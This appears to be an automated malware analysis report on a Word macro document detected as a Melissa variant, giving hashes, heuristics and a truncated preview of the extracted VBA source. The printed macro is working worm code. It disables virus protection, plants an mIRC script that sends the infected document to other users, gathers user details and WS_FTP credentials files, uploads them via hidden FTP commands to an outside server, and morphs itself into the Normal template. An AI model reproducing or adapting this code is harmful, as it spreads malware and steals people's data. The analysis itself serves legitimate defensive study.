Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c5d0ab247810fc75…

MALICIOUS

Office (OLE)

34.5 KB Created: 1999-04-01 19:52:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: aa475d4781d844537c31af65a29ccc61 SHA-1: d8d7b3f48302e2164df6fa29eee9689c29d44a55 SHA-256: c5d0ab247810fc75b4997ae4557da821625dadc906c887acdc77c52c0eb9e9f0
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This macro attempts to create a script.ini file in various locations, including 'C:\MIRC\Script.ini', suggesting an attempt to download and execute a secondary payload. The presence of the 'Doc.Trojan.Melissa-17' ClamAV detection further supports its malicious nature.

Heuristics 6

  • ClamAV: Doc.Trojan.Melissa-17 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Melissa-17
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18426 bytes
SHA-256: f6b0c3b018ecb03520d263d982e13ed115e874d9932be3420e45eb47104c1257
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Application.EnableCancelKey = wdDisabled
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Randomize Timer
LordArz = "Technological Illusions"
NormInstalled = False
ActInstalled = False
Set ActCarrier = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set NormCarrier = NormalTemplate.VBProject.VBComponents(1).CodeModule

NI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, 1)
AI = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, 1)

If UCase(NI) = "ON ERROR RESUME NEXT" Then NormInstalled = True
If UCase(AI) = "ON ERROR RESUME NEXT" Then ActInstalled = True

If NormInstalled = False Then
    Set Infection = NormCarrier
    Set Carrier = ActCarrier
Else
    Set Infection = ActCarrier
    Set Carrier = NormCarrier
End If



DoEvents

Rem -------------------BEGIN WORM------------------------------------->
Close
Tr1 = Dir(CurDir & "\script.ini", vbNormal)
Tr2 = UCase(Right(CurDir, 8))
Tr3 = Dir("C" & Chr(58) & "\MIRC", vbDirectory)

If Tr1 <> "" Then SDir = CurDir & "\script.ini"
If Tr2 = "DOWNLOAD" Then SDir = CurDir & "\..\Script.ini"
If Tr3 <> "" Then SDir = "C" & Chr(58) & "\MIRC\Script.ini"

If SDir <> "" Then
    Open SDir For Output As #1
    Print #1, "n0=on 1" & Chr(59) & "JOIN" & Chr(59) & "#" & Chr(59) & "if ( $me != $nick ) { /dcc send $nick " & ThisDocument.FullName & " }"
    Close #1
End If
Rem ----------------------------END WORM------------------------------>
DoEvents
Rem ----------------------------BEGIN PAYLOAD------------------------->

WinPath = Environ("WINDIR")

If Application.Tasks.Exists("Sockets Window") = True And System.PrivateProfileString("", "HKEY_CURRENT_USER\Software", "") = "" Or System.PrivateProfileString("", "HKEY_CURRENT_USER\Software", "") = WeekDay(Date) Then
    With Application.FileSearch
            .FileName = "WS_FTP.ini"
            .LookIn = "C" & Chr(58) & "\"
            .SearchSubFolders = True
            .MatchTextExactly = True
            .FileType = msoFileTypeAllFiles
            .Execute
            WsPath = .FoundFiles(1)
    End With
       
    DoEvents
    
    If ActiveDocument.HasPassword = True Then BCK = True
    
    DoEvents
    Open WinPath & "\" & Application.UserInitials & ".dat" For Output As #10
    Print #10, Application.UserName
    Print #10, Application.UserAddress
    If BCK = True Then Print #10, ActiveDocument.FullName
    If WsPath <> "" Then Print #10, "WS_FTP"
    Close #10
    Open WinPath & "\Command.$$$" For Output As #8
    Print #8, "o ftp.xoom.com"
    Print #8, "User SingOfScream"
    Print #8, "DIG001"
    Print #8, "binary"
    Print #8, "put " & WinPath & "\" & Application.UserInitials & ".dat"
    If WsPath <> "" Then Print #8, "put " & WsPath
    If BCK = True Then Print #8, "put " & ActiveDocument.FullName
        Print #8, "quit"
    Close
    Shell WinPath & "\command.com /c FTP.exe -n -s:" & WinPath & "\Command.$$$", vbHide
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software", "") = WeekDay(Date)
End If
Rem ------------------------------END OF PAYLOAD---------------------->

For x = 1 To ThisDocument.Variables.Count
    ThisDocument.Variables(x).Delete
Next x
For x = 1 To Normal.ThisDocument.Variables.Count
    Normal.ThisDocument.Variables(x).Delete
Next x

With Carrier
    UECode = .Lines(1, 2) & Chr(13)
    For x = 5 To .CountOfLines - 1
        VCCode = .Lines(x, 1)
        If VCCode = "End Sub" Then Exit For
        For i = 1 To 20
            If Mid(VCCode, i, 1) = ":" Then VCCode = Right(VCCode, Len(VCCode) - i)
        Next i
        factor = ""
        For Y = 1 To Int(Rnd * 6) + 6
            factor = factor & Chr(Int(Rnd * 25) + 65)
        Next Y
        make_morph = 
... (truncated)